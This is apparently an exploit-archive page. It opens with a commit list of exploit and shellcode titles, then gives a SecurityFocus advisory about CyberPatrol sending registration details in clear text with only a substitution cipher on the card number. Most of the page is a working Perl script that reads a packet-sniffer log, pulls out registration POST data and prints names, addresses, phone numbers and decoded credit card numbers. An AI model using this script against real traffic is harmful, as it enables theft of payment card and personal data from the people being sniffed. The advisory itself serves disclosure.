880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
65 lines
No EOL
2.5 KiB
Perl
Executable file
65 lines
No EOL
2.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/1977/info
|
|
|
|
CyberPatrol is popular web access restriction software by Microsys.
|
|
|
|
A vulnerability exists in the way CyberPatrol submits registration information from its client software to Microsys' backend (cybercentral.microsys.com) that could allow a remote attacker to gather confidential information including credit card details.
|
|
|
|
The client software claims that all information including credit card details are "scrambled" before being sent to Microsys' backend. Installation of a sniffer has shown that all information with the exception of the credit card number is actually sent in clear text to Microsys. A remote attacker could place a sniffer upstream from the sending client and gather confidential registration information in addition to the credit card number which is only protected by a substitution cypher (please see the original bugtraq message in the reference section for details on the cypher). Additionally, this information could be obtained by examining the log files of a proxy firewall.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
$showline=0;
|
|
open(SNORT, "log");
|
|
LINE:while($line=<SNORT>){
|
|
@field=split /\s/, $line;
|
|
if($#field>0 && $#field<15){next LINE;}
|
|
if(!($line=~/\w/)){
|
|
$registerinfo=~s/\%20/ /g;
|
|
$registerinfo=~s/\%40/@/g;
|
|
($junk, $registerinfo)=split /\.\.\.\./, $registerinfo;
|
|
@array=split /\&/, $registerinfo;
|
|
if($array[0]=~/EMAIL/){print "$array[0]\n";}
|
|
|
|
if($array[1]=~/CARD/){print "CARD=";}
|
|
@chararray=split //, $array[1];
|
|
$arraylength=$#chararray;
|
|
for($i=0; $i<$arraylength+1; ++$i){
|
|
if($chararray[$i]=~/\%/){
|
|
$checkchar="$chararray[$i]";
|
|
$checkchar.="$chararray[$i+1]";
|
|
$checkchar.="$chararray[$i+2]";
|
|
$i=$i+2;
|
|
}
|
|
else{$checkchar="$chararray[$i]";}
|
|
|
|
if($checkchar=~/z/){print "0";}
|
|
elsif($checkchar=~/{/){print "1";}
|
|
elsif($checkchar=~/x/){print "2";}
|
|
elsif($checkchar=~/y/){print "3";}
|
|
elsif($checkchar=~/\%7E/){print "4";}
|
|
elsif($checkchar=~/\./){print "5";}
|
|
elsif($checkchar=~/\|/){print "6";}
|
|
elsif($checkchar=~/\}/){print "7";}
|
|
elsif($checkchar=~/r/){print "8";}
|
|
elsif($checkchar=~/s/){print "9";}
|
|
|
|
|
|
}
|
|
|
|
if($array[2]=~/EXP/){print "\n$array[2]\n";}
|
|
if($array[3]=~/NAME/){print "$array[3]\n";}
|
|
if($array[4]=~/ADDR1/){print "$array[4]\n";}
|
|
if($array[5]=~/ADDR2/){print "$array[5]\n";}
|
|
if($array[6]=~/CITY/){print "$array[6]\n";}
|
|
if($array[7]=~/PHONE/){print "$array[7]\n\n\n";}
|
|
|
|
$registerinfo="";
|
|
$showline=0;
|
|
}
|
|
if($line=~/POST/){$showline=1}
|
|
if($showline eq 1){
|
|
($junk, $line)=split / /, $line;
|
|
chomp($line);
|
|
$registerinfo.=$line;
|
|
}
|
|
} |